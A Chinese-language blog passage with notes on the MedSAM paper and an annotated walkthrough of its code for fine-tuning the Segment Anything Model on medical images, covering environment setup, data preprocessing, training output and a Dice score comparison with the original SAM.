    best_loss = epoch_loss
    torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_best.pth')) # 最优 checkpoint
    self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
    100%|██████████| 57/57 [00:09<00:00, 5.95it/s]
    EPOCH: 0, Loss: 0.2000392587589366
    ……
    100%|██████████| 57/57 [00:05<00:00, 11.29it/s]
    EPOCH: 99, Loss: 0.03958414628037384

    plot loss

    plt.plot(losses)
    plt.title('Dice + Cross Entropy Loss')
    plt.xlabel('Epoch')
    plt.ylabel('Loss')
    plt.show() # comment this line if you are running on a server
    plt.savefig(join(model_save_path, 'train_loss.png'))
    plt.close()

    如果我把 pycharm 的主题设成深色的,matplotlib 输出的图片居然也会是深色的……

    png

    load the original SAM model

    from skimage import io
    # 加载 原始 SAM 模型 到 GPU 上
    ori_sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device)
    # 加载 predictor
    ori_sam_predictor = SamPredictor(ori_sam_model)

    # 读入数据集
    ts_img_path = 'data/MedSAMDemo_2D/test/images'
    ts_gt_path = 'data/MedSAMDemo_2D/test/labels'
    test_names = sorted(os.listdir(ts_img_path))

    # random select a test case
    # 随机读取一张图像
    img_idx = np.random.randint(len(test_names)) # 获取索引
    image_data = io.imread(join(ts_img_path, test_names[img_idx])) # 读取
    if image_data.shape[-1]>3 and len(image_data.shape)==3: # 确保图像只有 3 个通道
    image_data = image_data[:,:,:3]
    if len(image_data.shape)==2: # 如果是单通道的灰度图像,转成 3 通道
    image_data = np.repeat(image_data[:,:,None], 3, axis=-1)
    # read ground truth (gt should have the same name as the image) and simulate a bounding box
    def get_bbox_from_mask(mask):
    '''
    Returns a bounding box from a mask
    从 ground truth 中提取出边界框坐标信息,用于对图像进行裁剪
    '''
    y_indices, x_indices = np.where(mask > 0)
    x_min, x_max = np.min(x_indices), np.max(x_indices)
    y_min, y_max = np.min(y_indices), np.max(y_indices)
    # add perturbation to bounding box coordinates
    H, W = mask.shape
    x_min = max(0, x_min - np.random.randint(0, 20))
    x_max = min(W, x_max + np.random.randint(0, 20))
    y_min = max(0, y_min - np.random.randint(0, 20))
    y_max = min(H, y_max + np.random.randint(0, 20))

    return np.array([x_min, y_min, x_max, y_max])

    # 获得 ground truth
    gt_data = io.imread(join(ts_gt_path, test_names[img_idx]))
    bbox_raw = get_bbox_from_mask(gt_data)

    # preprocess: cut-off and max-min normalization 图像预处理
    lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
    image_data_pre = np.clip(image_data, lower_bound, upper_bound)
    # 亮度范围裁剪
    image_data_pre = (image_data_pre - np.min(image_data_pre))/(np.max(image_data_pre)-np.min(image_data_pre))*255.0
    image_data_pre[image_data==0] = 0
    image_data_pre = np.uint8(image_data_pre)
    H, W, _ = image_data_pre.shape

    # predict the segmentation mask using the original SAM model
    # 开跑!
    ori_sam_predictor.set_image(image_data_pre)
    ori_sam_seg, _, _ = ori_sam_predictor.predict(point_coords=None, box=bbox_raw, multimask_output=False)

    predict the segmentation mask using the fine-tuned model

    # resize image to 3*1024*1024
    # 使用 ResizeLongestSide() 函数对原始图像进行大小调整,将其 resize 为 3x1024x1024 的张量
    sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
    resize_img = sam_transform.apply_image(image_data_pre)
    # 将调整后的图像张量转换为 PyTorch tensor
    resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(device)
    input_image = sam_model.preprocess(resize_img_tensor[None,:,:,:]) # (1, 3, 1024, 1024)
    assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'

    with torch.no_grad():
    # pre-compute the image embedding 使用模型的 image_encoder 对象计算图像嵌入向量
    ts_img_embedding = sam_model.image_encoder(input_image)
    # convert box to 1024x1024 grid 将 box 坐标信息调整到 1024x1024 的网络 grid 上
    bbox = sam_trans.apply_boxes(bbox_raw, (H, W))
    print(f'{bbox_raw=} -> {bbox=}')
    box_torch = torch.as_tensor(bbox, dtype=torch.float, device=device)
    if len(box_torch.shape) == 2:
    box_torch = box_torch[:, None, :] # (B, 4) -> (B, 1, 4)

    # 使用 prompt_encoder 对象计算稠密和稀疏的嵌入向量(dense and sparse embedding)
    sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
    points=None,
    boxes=box_torch,
    masks=None,
    )
    medsam_seg_prob, _ = sam_model.mask_decoder( # 各种图像嵌入向量
    image_embeddings=ts_img_embedding.to(device), # (B, 256, 64, 64)
    image_pe=sam_model.prompt_encoder.get_dense_pe(), # (1, 256, 64, 64)
    sparse_prompt_embeddings=sparse_embeddings, # (B, 2, 256)
    dense_prompt_embeddings=dense_embeddings, # (B, 256, 64, 64)
    multimask_output=False,
    )
    medsam_seg_prob = torch.sigmoid(medsam_seg_prob) # 压缩到[0, 1]
    # convert soft mask to hard mask
    medsam_seg_prob = medsam_seg_prob.cpu().numpy().squeeze()
    medsam_seg = (medsam_seg_prob > 0.5).astype(np.uint8)
    print(medsam_seg.shape)
    bbox_raw=array([164, 159, 189, 187], dtype=int64) -> bbox=array([[656, 636, 756, 748]], dtype=int64)
    (256, 256)

    计算准确率

    表明我们这个操作确实牛逼!

    ori_sam_dsc = compute_dice_coefficient(gt_data>0, ori_sam_seg>0)
    medsam_dsc = compute_dice_coefficient(gt_data>0, medsam_seg>0)
    print('Original SAM DSC: {:.4f}'.format(ori_sam_dsc), 'MedSAM DSC: {:.4f}'.format(medsam_dsc))
    Original SAM DSC: 0.7397 MedSAM DSC: 0.9145

    visualization functions

    # visualization functions
    # source: https://github.com/facebookresearch/segment-anything/blob/main/notebooks/predictor_example.ipynb
    # change color to avoid red and green
    def show_mask(mask, ax, random_color=False):
    if random_color:
    color = np.concatenate([np.random.random(3), np.array([0.6])], axis=0)
    else:
    color = np.array([251/255, 252/255, 30/255, 0.6])
    h, w = mask.shape[-2:]
    mask_image = mask.reshape(h, w, 1) * color.reshape(1, 1, -1)
    ax.imshow(mask_image)

    def show_box(box, ax):
    x0, y0 = box[0], box[1]
    w, h = box[2] - box[0], box[3] - box[1]
    ax.add_patch(plt.Rectangle((x0, y0), w, h, edgecolor='blue', facecolor=(0,0,0,0), lw=2))

    _, axs = plt.subplots(1, 3, figsize=(25, 25))
    axs[0].imshow(image_data)
    show_mask(gt_data>0, axs[0])
    # show_box(box_np[img_id], axs[0])
    # axs[0].set_title('Mask with Tuned Model', fontsize=20)
    axs[0].axis('off')

    axs[1].imshow(image_data)
    show_mask(ori_sam_seg, axs[1])
    show_box(bbox_raw, axs[1])
    # add text to image to show dice score
    axs[1].text(0.5, 0.5, 'SAM DSC: {:.4f}'.format(ori_sam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
    # axs[1].set_title('Mask with Untuned Model', fontsize=20)
    axs[1].axis('off')

    axs[2].imshow(image_data)
    show_mask(medsam_seg, axs[2])
    show_box(bbox_raw, axs[2])
    # add text to image to show dice score
    axs[2].text(0.5, 0.5, 'MedSAM DSC: {:.4f}'.format(medsam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
    # axs[2].set_title('Ground Truth', fontsize=20)
    axs[2].axis('off')
    plt.show()
    plt.subplots_adjust(wspace=0.01, hspace=0)
    # save plot
    # plt.savefig(join(model_save_path, test_npzs[npz_idx].split('.npz')[0] + str(img_id).zfill(3) + '.png'), bbox_inches='tight', dpi=300)
    plt.close()

    png

    ]]>
    + 资源

    笔记

    • SAM 真是太牛逼啦!但是它在医学图像上的性能十分有限。

    • 介绍了 MedSAM

      • 设计了一个大规模的医学图像数据集,包含 11 种模式,20 多万个蒙版。提供了关于在定制的新数据集上微调 SAM 的分步教程

      • 开发了一种简单的微调方法(simple fine-tuning method),将 SAM 用于普通医学图像分割。在 21 个 3D 分割任务和 9 个 2D 任务中,比默认 SAM 要好使。


    ​ 第一个也是最著名的**基础分割模型(segmentation foundation model)**是 SAM,它在超过 1B 个蒙版上进行训练,可以根据提示(例如,边界框、点、文本)或以全自动的方式生成准确的对象蒙版。但是自然图像和医学图像之前存在显著差异,这些模型在医学图像分割中的适用性仍然有限,在一些典型的医学图像分割任务(对象边缘信息较弱)中不好使。


    ​ SAM 利用了基于 transformer 的架构:

    • 使用 transformer-based 的**图像编码器(image encoder)**提取图像特征

      • pretrained with masked auto-encoder modeling,可以处理高分辨率图像(即 $1024\times 1024$),获得的图像嵌入是 $16\times \mathrm{downscaled}(64\times 64)$
    • 使用**提示编码器(prompt encoder)**结合用户交互

      • 支持四种不同的提示
        • 点:通过傅里叶位置编码和两个可学习的标记进行编码,分别用于指定前景和背景
        • 边界框:通过其左上角的点和右下角的点进行编码
        • 文本:由 CLIP 中经过预训练的文本编码器进行编码
        • 掩码:与输入图像具有相同的分辨率,输入图像由卷积特征图编码
    • 使用**掩码解码器(mask encoder)**来基于图像嵌入、提示嵌入和输出令牌生成分割结果和置信度得分。

      • 采用了轻量级设计,由两个转换器层组成,具有动态蒙版预测头和两个交集(Intersection-over-Union,IOU)分数回归头。

    ​ 蒙版预测头可以生成 3 个 $4\times \mathrm{downscaled\ masks}$,分别对应于整个对象、部分对象和子对象。

    png


    SAM 支持 3 中主要的分割模式:

    • 以全自动方式分割所有内容(segment everything in a fully automatic way)
      • 没有语义标签,一些分割的东西无意义
    • 边界框模式(bounding box mode)
      • 只给出左上角和右下角的点,就可以为右肾提供良好的分割结果
    • 点模式(point mode)
      • 先给一个前景点,再给一个背景点

    我们认为,在医学图像分割任务中使用 SAM 时,基于边界框的分割模式比基于分割一切和点的分割模式具有更广泛的实用价值。


    ​ 为了使 SAM 适用于医学图像分割,有必要选择适当的用户提示和网络组件进行微调。

    ​ 基于以上分析,边界框提示是指定分割目标的正确选择。SAM 的网络架构包含三个主要组件:图像编码器提示编码器掩码解码器。人们可以选择微调它们的任何组合。

    • 图像编码器基于 vision transformer,该转换器在 SAM 中具有最大的计算开销。为了降低计算成本,将图像编码器 冻结

    • 提示编码器对边界框的位置信息进行编码,并且可以从 SAM 中预先训练的边界框编码器中重复使用,冻结

    • 微调 掩码解码器

    png

    ​ 由于图像编码器可以在提示模型之前应用,因此我们可以预先计算所有训练图像的图像嵌入,以避免每次提示的图像嵌入的重复计算,这可以显著提高训练效率。掩码解码器只需要生成一个掩码,而不需要生成三个掩码,因为在大多数情况下,边界框提示可以清楚地指定预期的分割目标。


    ​ 每个数据集被随机分为80个和20个,用于训练和测试。排除了像素小于 100 的分割目标。由于 SAM 是为 2D 图像分割而设计的,我们将3D图像(即CT、MR、PET)沿平面外维度划分为2D切片。然后,我们使用预先训练的 ViT-Base 模型作为图像编码器,并通过将归一化的图像馈送到图像编码器来离线计算所有图像嵌入(图像编码器将图像大小转换为 $3\times 1024\times 1024$)。在训练期间,边界框提示是从具有0-20个像素的随机扰动的地面实况掩码生成的。损失函数是Dice损失和交叉熵损失之间的未加权和,已被证明在各种分割任务中是稳健的。Adam 优化器对网络进行了优化,初始学习率为1e-5。


    ​ 使用骰子相似系数(DSC)归一化表面距离(NSD,公差 1mm)来评估基本事实和分割结果之间的区域重叠率和边界一致性,这是两种常用的分割指标


    ​ 我们的代码和经过训练的模型是公开的,我们提供了关于在定制的新数据集上微调SAM的分步教程。我们期待着与社区合作,共同推进这一令人兴奋的研究领域。

    代码

    配置

    新建一个 conda 环境:

    1
    conda create -n medsam python=3.10 -y

    激活之:

    1
    conda activate medsam

    离线安装 pytorch:

    download.pytorch.org/whl/torch_stable.html 下载对应版本的 pytorchtorchvision

    • torch-2.0.0+cu117-cp310-cp310-win_amd64.whl
    • torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl

    png

    安装之:

    1
    pip install torch-2.0.0+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
    1
    pip install torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

    下载仓库:bowang-lab/MedSAM:MedSAM:Segment Anything in Medical Images的官方存储库。 (github.com)

    在仓库文件夹下:

    1
    pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple

    在自定义数据集上微调 SAM

    1. 打开 pre_CT.py ,查看里面 parser 都定义了什么玩意儿:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    # set up the parser
    parser = argparse.ArgumentParser(description='preprocess CT images')
    parser.add_argument('-i', '--nii_path', type=str, default='data/FLARE22Train/images', help='path to the nii images')
    parser.add_argument('-gt', '--gt_path', type=str, default='data/FLARE22Train/labels', help='path to the ground truth',)
    parser.add_argument('-o', '--npz_path', type=str, default='data/Npz_files', help='path to save the npz files')

    parser.add_argument('--image_size', type=int, default=256, help='image size')
    parser.add_argument('--modality', type=str, default='CT', help='modality')
    parser.add_argument('--anatomy', type=str, default='Abd-Gallbladder', help='anatomy')
    parser.add_argument('--img_name_suffix', type=str, default='_0000.nii.gz', help='image name suffix')
    parser.add_argument('--label_id', type=int, default=9, help='label id')
    parser.add_argument('--prefix', type=str, default='CT_Abd-Gallbladder_', help='prefix')
    parser.add_argument('--model_type', type=str, default='vit_b', help='model type')
    parser.add_argument('--checkpoint', type=str, default='work_dir/SAM/sam_vit_b_01ec64.pth', help='checkpoint')
    parser.add_argument('--device', type=str, default='cuda:0', help='device')
    # seed
    parser.add_argument('--seed', type=int, default=2023, help='random seed')
    args = parser.parse_args()
    参数名简称类型默认值备注
    –nii_path-istr‘data/FLARE22Train/images’path to the nii images
    –gt_path-gtstr‘data/FLARE22Train/labels’path to the ground truth
    –npz_path-ostr‘data/Npz_files’path to save the npz files
    –image_sizeint256image size
    –modalitystr‘CT’modality 形态
    –anatomystr‘Abd-Gallbladder’anatomy 解剖
    –img_name_suffixstr‘_0000.nii.gz’image name suffix 图像名称后缀
    –label_idint9label id
    –prefixstr‘CT_Abd-Gallbladder_’prefix 前缀
    –model_typestr‘vit_b’model type 模型类别
    –checkpointstr‘work_dir/SAM/sam_vit_b_01ec64.pth’checkpoint
    –devicestr‘cuda:0’device
    –seedint2023random seed 随机数种子
    1. 下载 sam_vit_b_01ec64.pth 并将其放置在 work_dir/SAM/ 中:

    png

    3D

    1. 下载 FLARE22Train.zip 并将其解压,放置在 data/ 中:

    png

    该数据集包含 50 个腹部 CT 扫描,每个扫描包含一个包含 13 个器官的注释面罩。器官标签的名称可在 MICCAI FLARE2022 上找到。 在本教程中,我们将微调 SAM 以进行胆囊 (gallbladder) 分割。

    nii.gz 是一种常见的医学影像数据格式。它是基于 NIfTI(Neuroimaging Informatics Technology Initiative)格式的一种压缩文件,通常用于存储头颅和身体的 MRI 和 CT 数据。该格式包含图像的三维体积数据,以及与图像相关的元数据信息,如图像分辨率、采集参数等。nii.gz 文件可以通过各种软件进行读取、编辑和处理,如 FSL、SPM、ANTs 等。

    1. 开跑 pre_CT.py 这只是个预处理!

      • 拆分数据集:80% 用于训练,20% 用于测试

      • 图像归一化

      • 预计算图像嵌入

      • 将归一化图像 imgs.npy、真实情况掩码 gts.npy 和图像 img_embeddings.npy 嵌入另存为文件 npz

    npy 文件是 numpy 保存单个数组的一种二进制文件格式,它可以包含一个 numpy 数组,这个数组的维度和类型等信息都可以被存储在这个文件中。npy 文件通过使用 numpy 库中的 load() 和 save() 函数进行读写。

    相比于 txt、csv 这样的文本型数据文件,npy 文件具有更好的性能和可靠性。因为文本型数据需要进行字符串转化和解析等操作,在面对大量数据时会出现读写速度较慢的情况,并且数据解析容易受到不同系统和软件的影响而出现错误。而 npy 文件采用二进制存储,可以直接将内存中的二进制数组写入文件,不需要转化和解析字符串,性能更高,同时因为没有转化字符类型,也不存在因不同系统和软件的影响而出现的数据解析错误。

    npz 是 numpy 保存数组的一种格式,它是一种压缩文件格式,可以将多个 numpy 数组打包存放在一个文件中,其压缩率较高。使用 np.savez_compressed() 函数可以生成 .npz 文件,使用 np.load() 函数可以读取 .npz 文件中的数组。相比其他文件格式(如 .txt、.csv 等),.npz 文件可以更方便地用于存储和加载大型数组数据集,因为它可以使用 numpy 库提供的高效的加载和存储方法。此外,.npz 文件还可以轻松地传递和共享数组数据集,并且不像其他文件格式那样需要手动编写 IO 操作代码来读取和写入数据。

    png

    1. 然后就可以跑 finetune_and_inference_tutorial_3D_dataset.ipynb

    2D

    1. MedSAMDemo_2D.zip - Google Drive 下载 2D 数据集,放置在 data/ 中:

    png

    png

    png

    1. 开跑 pre_grey_rgb2D.py 这只是个预处理!好在这部分用时不是很长,就拿笔记本直接跑了。

    png

    1. 获得 data\demo2D_vit_b\demo2d.npz!然后就可以跑 finetune_and_inference_tutorial_2D_dataset.ipynb

    png

    又遇俩坑,填填填:

    1
    2
    pip install chardet
    pip install --force-reinstall charset-normalizer==3.1.0

    可以跑了!

    png

    看代码

    pre_grey_rgb2D.py

    这个代码主要是对数据集进行预处理。

    set up the parser

    nametypedefaulthelp
    -i, --img_pathstrdata/MedSAMDemo_2D/train/imagespath to the images
    -gt, --gt_pathstrdata/MedSAMDemo_2D/train/labelspath to the ground truth (gt)
    -o, --npz_pathstrdata/demo2Dpath to save the npz files
    –data_namestrdemo2ddataset name; used to name the final npz file, e.g., demo2d.npz
    –image_sizeint256image size
    –img_name_suffixstr.pngimage name suffix
    –label_idint255label id
    –model_typestrvit_bmodel type
    –checkpointstrwork_dir/SAM/sam_vit_b_01ec64.pthcheckpoint
    –devicestrcuda:0device
    –seedint2023random seed
    1
    2
    3
    4
    5
    6
    7
    8
    # 获取 args.gt_path 目录下所有文件名,并按字典序排序,将结果赋值给 names
    names = sorted(os.listdir(args.gt_path))
    # 将 args.npz_path 和 args.model_type 拼接成一个新路径名 save_path
    save_path = args.npz_path + '_' + args.model_type
    # 创建新的目录save_path。如果该目录已经存在,则不做任何操作。如果不存在,则新建该目录及其所有上级目录
    os.makedirs(save_path, exist_ok=True)
    # 打印输出 names 列表的长度即图片数量
    print('image number:', len(names))

    set up the model

    1
    2
    # 初始化模型,设置好 args.model_type、args.checkpoint、args.device
    sam_model = sam_model_registry[args.model_type](checkpoint=args.checkpoint).to(args.device)

    convert 2d grey or rgb images to npz file

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    imgs = []  # 图片(images)
    gts = [] # 标签(labels)
    img_embeddings = [] # 图片嵌入信息

    # 遍历 ground truth 文件夹, names 默认为 args.gt_path('data/MedSAMDemo_2D/train/labels')下排序好的文件列表
    for gt_name in tqdm(names):
    image_name = gt_name.split('.')[0] + args.img_name_suffix # 获得文件名称 + 后缀名
    gt_data = io.imread(join(args.gt_path, gt_name)) # 获得 ground truth 数据
    if len(gt_data.shape)==3: # 如果 gt_data 是三维的,则只取第一个通道(灰度图)
    gt_data = gt_data[:,:,0]
    assert len(gt_data.shape)==2, 'ground truth should be 2D' # 确保分割标签是二维的(高和宽)
    # 这行代码的作用是将分割标签(即 gt_data)缩放到指定大小(args.image_size),并将其值转换为二进制形式(0 和 1)。
    # 具体来说,它会将分割标签中所有等于 args.label_id 的像素点设置为 1,其余像素点设置为 0,然后将结果缩放到指定大小。
    # 这里使用了 scikit-image 库的 transform.resize 函数,
    # 并指定了 order=0 表示使用最近邻插值法,
    # preserve_range=True 表示保持输入图像的范围不变(即值仍在 0 到 1 之间),
    # mode='constant' 表示在缩放后填充常数值的方式为使用边界值填充。
    # 最终得到的结果是一个二值图像,即只包含 0 和 1 两种像素值的图像。
    gt_data = transform.resize(gt_data==args.label_id, (args.image_size, args.image_size), order=0, preserve_range=True, mode='constant')
    # 将gt_data值转换为 8 位无符号整数
    gt_data = np.uint8(gt_data)

    # exclude tiny objects 如果分割标签中包含的像素点数大于 100,则执行以下操作(对源图像进行预处理,加入最终的数据集中)
    if np.sum(gt_data)>100:
    # 最大值是 1,就两种像素点。确保分割标签是二值图
    assert np.max(gt_data)==1 and np.unique(gt_data).shape[0]==2, 'ground truth should be binary'
    # 获得图像数据
    image_data = io.imread(join(args.img_path, image_name))
    # 如果图像包含透明度通道,则只取前三个通道,即 RGB 通道
    if image_data.shape[-1]>3 and len(image_data.shape)==3:
    image_data = image_data[:,:,:3]
    # 如果图像只有一个通道,则将其复制三次,即得到一个 RGB 图像
    if len(image_data.shape)==2:
    image_data = np.repeat(image_data[:,:,None], 3, axis=-1)
    # nii preprocess start
    # 计算图像的亮度范围,即确定合适的像素值下限和上限
    # 使用 np.percentile 函数分别计算了图像中像素值从小到大排列后第 0.5% 和第 99.5% 的值,
    # 将其作为下限和上限,用于后续的像素值标准化处理
    lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
    # 将图像中的像素值限制在 lower_bound 和 upper_bound 之间
    image_data_pre = np.clip(image_data, lower_bound, upper_bound)
    # 将调整后的图像进行标准化,方法是先将图像中所有像素值减去最小值,然后除以像素值范围(即最大值减去最小值),最后乘以255,使像素值缩放到0-255的范围。
    # 这样做的目的是为了使得图像不受亮度范围的影响,并且方便后续模型的处理,因为很多模型输入都需要归一化的图像数据
    image_data_pre = (image_data_pre - np.min(image_data_pre))/(np.max(image_data_pre)-np.min(image_data_pre))*255.0
    # 将背景像素(黑色)设置为 0
    image_data_pre[image_data==0] = 0
    # 调整图像大小,并使用三次样条插值方法进行重采样,使得图像更加平滑,并保持图像的范围不变
    image_data_pre = transform.resize(image_data_pre, (args.image_size, args.image_size), order=3, preserve_range=True, mode='constant', anti_aliasing=True)
    # 将图像像素值转换为 8 位无符号整数
    image_data_pre = np.uint8(image_data_pre)

    # 将处理后的图像添加到 imgs 列表中
    imgs.append(image_data_pre)
    # 确保分割标签中包含的像素点数大于100(这里为啥又问一遍?闻到了屎山的味道)
    assert np.sum(gt_data)>100, 'ground truth should have more than 100 pixels'
    # 将处理后的分割标签添加到gts列表中
    gts.append(gt_data)
    # resize image to 3*1024*1024
    # 创建一个 ResizeLongestSide 对象
    # ResizeLongestSide 的类,用于将图像和坐标进行长边缩放。
    # 具体来说,该类实现了 apply_image 和 apply_coords 两个方法,分别用于处理图像和坐标
    sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
    # 将该 ResizeLongestSide 对象应用于 image_data_pre 图像,重新调整大小并返回新的图像 resize_img
    resize_img = sam_transform.apply_image(image_data_pre)
    # 将 numpy 数组 resize_img 转换为 PyTorch 张量,同时将其移动到 GPU
    resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(args.device)
    # 对图像进行预处理,例如减去均值、除以标准差等
    input_image = sam_model.preprocess(resize_img_tensor[None,:,:,:]) # (1, 3, 1024, 1024)
    assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'
    # pre-compute the image embedding
    # 对输入图像进行特征提取,得到图片的 embedding
    with torch.no_grad():
    embedding = sam_model.image_encoder(input_image)
    img_embeddings.append(embedding.cpu().numpy()[0])

    save all 2D images as one npz file: ori_imgs, ori_gts, img_embeddings

    stack the list to array

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    # 将所有2D图像以及它们的相关信息(如 ground truth 和 image embedding)保存成一个 npz 文件
    if len(imgs)>1:
    imgs = np.stack(imgs, axis=0) # (n, 256, 256, 3) 表示 n 张 256x256 的 RGB 图像
    gts = np.stack(gts, axis=0) # (n, 256, 256) 表示 n 张 256x256 的灰度图像
    img_embeddings = np.stack(img_embeddings, axis=0) # (n, 1, 256, 64, 64) 将每张图像转换为了1个256x64x64的图像embedding
    # 使用np.savez_compressed函数将这三个numpy数组保存成一个npz文件,其中imgs、gts和img_embeddings分别对应三个关键字参数
    np.savez_compressed(join(save_path, args.data_name + '.npz'), imgs=imgs, gts=gts, img_embeddings=img_embeddings)
    # save an example image for sanity check 随机选择一个图像进行可视化检查
    idx = np.random.randint(imgs.shape[0]) # 随机生成一个索引 idx
    # 从 imgs、gts 和 img_embeddings 中提取出该索引对应的图像
    # img_idx、ground truth gt_idx 和 image embedding img_emb_idx
    img_idx = imgs[idx,:,:,:]
    gt_idx = gts[idx,:,:]
    # 代码使用scikit-image库的find_boundaries函数找到gt_idx中每个目标的边缘位置,并将img_idx中边缘位置的像素设为红色
    bd = segmentation.find_boundaries(gt_idx, mode='inner')
    # 将边缘设为红色
    img_idx[bd, :] = [255, 0, 0]
    # 使用io.imsave函数将处理后的img_idx保存成png文件,以便进一步进行可视化检查
    io.imsave(save_path + '.png', img_idx, check_contrast=False)

    finetune_and_inference_tutorial_2D_dataset.ipynb

    在获得预处理好的数据集后,就可以运行 finetune_and_inference_tutorial_2D_dataset.ipynb 对 SAM 模型进行 fine-tune。

    class NpzDataset(Dataset)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    class NpzDataset(Dataset): 
    def __init__(self, data_root):
    # 读取指定目录下的所有 .npz 文件
    self.data_root = data_root
    self.npz_files = sorted(os.listdir(self.data_root))
    self.npz_data = [np.load(join(data_root, f)) for f in self.npz_files]
    # this implementation is ugly but it works (and is also fast for feeding data to GPU) if your server has enough RAM as an alternative, you can also use a list of npy files and load them one by one
    # 这个实现是丑陋的,但它可以工作(并且向 GPU 提供数据的速度也很快)如果你的服务器有足够的 RAM 作为替代方案,你也可以使用 npy 文件列表并一个一个地加载它们
    # 使用了 np.vstack() 函数对这些数组进行垂直方向上的堆叠操作
    # 将它们的 gts 和 img_embeddings 字段整合成两个 numpy 数组: ori_gts 和 img_embeddings
    self.ori_gts = np.vstack([d['gts'] for d in self.npz_data])
    self.img_embeddings = np.vstack([d['img_embeddings'] for d in self.npz_data])
    # 包含了一条有用的调试信息输出语句,输出实际读取数据文件中的 img_embeddings 和 ori_gts 的形状
    print(f"{self.img_embeddings.shape=}, {self.ori_gts.shape=}")

    def __len__(self):
    """
    这段代码定义了 __len__ 方法,该方法返回数据集的大小(即所有样本的个数),在该代码中返回的是 ori_gts 数组的第一维大小。
    由于在 NpzDataset 类初始化时,已经将所有 npz 文件中的 gts 字段整合成一个 numpy 数组 ori_gts,因此该方法返回的是所有读取文件中的目标个数(即数据集中的样本数)
    """
    return self.ori_gts.shape[0]

    def __getitem__(self, index):
    # 词嵌入向量
    img_embed = self.img_embeddings[index]
    # Ground Truth
    gt2D = self.ori_gts[index]
    # 边界框
    y_indices, x_indices = np.where(gt2D > 0)
    x_min, x_max = np.min(x_indices), np.max(x_indices)
    y_min, y_max = np.min(y_indices), np.max(y_indices)
    # add perturbation to bounding box coordinates
    # 向边界框坐标添加扰动,以实现数据增强
    H, W = gt2D.shape
    x_min = max(0, x_min - np.random.randint(0, 20))
    x_max = min(W, x_max + np.random.randint(0, 20))
    y_min = max(0, y_min - np.random.randint(0, 20))
    y_max = min(H, y_max + np.random.randint(0, 20))
    bboxes = np.array([x_min, y_min, x_max, y_max])
    # convert img embedding, mask, bounding box to torch tensor
    # 返回一个三元组:(一个图像的嵌入向量 img_embed, 对应标注的二维 Ground Truth 图 gt2D, 对应的包含目标的边界框的四个坐标 bboxes)
    return torch.tensor(img_embed).float(), torch.tensor(gt2D[None, :,:]).long(), torch.tensor(bboxes).float()

    test dataset class and dataloader

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    npz_tr_path = 'data/demo2D_vit_b'
    # 使用路径 npz_tr_path 创建了一个新的 NpzDataset 实例 demo_dataset
    demo_dataset = NpzDataset(npz_tr_path)
    # 训练开始前,代码使用 for 循环从 demo_dataloader 中依次读取一个小批量(batch)的数据,用于测试数据集和数据加载器的正确性。批大小为 8,这意味着每次迭代中将读取 8 个数据样本
    demo_dataloader = DataLoader(demo_dataset, batch_size=8, shuffle=True)
    for img_embed, gt2D, bboxes in demo_dataloader:
    # img_embed: (B, 256, 64, 64), gt2D: (B, 1, 256, 256), bboxes: (B, 4)
    # 使用 print() 函数打印了从 demo_dataloader 中读取的第一个小批量 img_embed、gt2D 和 bboxes 的形状,以确认它们是否与预期一致
    print(f"{img_embed.shape=}, {gt2D.shape=}, {bboxes.shape=}")
    # 这里程序使用 break 结束了遍历,只输出了第一个小批量的结果
    break

    set up model for fine-tuning

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    # train data path
    npz_tr_path = 'data/demo2D_vit_b' # 训练数据
    work_dir = './work_dir' # 工作目录路径
    task_name = 'demo2D' # 任务名称
    # prepare SAM model
    model_type = 'vit_b' # 模型类型
    checkpoint = 'work_dir/SAM/sam_vit_b_01ec64.pth' # 预训练模型
    device = 'cuda:0' # 设备
    model_save_path = join(work_dir, task_name) # 模型保存地址
    os.makedirs(model_save_path, exist_ok=True)
    sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device) # 加载模型
    sam_model.train() # 设为训练模式
    # Set up the optimizer, hyperparameter tuning will improve performance here
    optimizer = torch.optim.Adam(sam_model.mask_decoder.parameters(), lr=1e-5, weight_decay=0) # 优化器
    # 代码定义了一个分割损失函数,其中采用 DiceLoss 和 CrossEntropyLoss 的结合体。
    # DiceLoss 是一个测量预测分割与真实分割偏差的指标,CrossEntropyLoss 则是针对多分类问题的损失函数,用于评估预测结果的匹配程度
